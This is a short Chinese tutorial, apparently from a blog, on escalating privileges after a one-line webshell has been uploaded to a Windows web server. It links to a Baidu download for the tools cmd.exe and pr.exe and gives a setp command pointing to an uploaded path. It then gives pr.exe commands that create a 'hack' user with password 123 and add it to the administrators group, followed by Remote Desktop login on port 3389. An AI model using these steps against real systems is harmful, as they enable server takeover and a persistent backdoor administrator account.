1. 程式人生 > >一句話木馬提權

一句話木馬提權

很多時候,當我們上傳了一句話木馬之後,想要進行一些操作。比如,檢視當前使用者的身份,這時會發現許可權不夠,當前的命令列只對網站當前目錄下的檔案具有操作許可權,對其他目錄和系統都沒有許可權,這時我們就需要提權了。

我們把下面兩個程式上傳到網站目錄下去

程式連結:連結: https://pan.baidu.com/s/1ibgYfY38kBLsbq72NsVEHg    提取碼: unyc 

然後執行下面這條命令,把當前終端的執行程式設定成我們上傳的 cmd.exe

setp  "C:\website\站酷愛裝網V2012版\UploadFiles\cmd.exe"

然後我們就可以做我們想做的任何事情了。我們的命令用雙引號引住,前面加上 pr.exe

pr.exe "net user hack 123 /add"   #新建一個hack使用者,密碼為 123
pr.exe "net localgroup administrators hack /add" #將hack使用者加入administrators管理員組

 接著,我們就可以用遠端桌面登入了,前提是目標主機開啟了3389遠端埠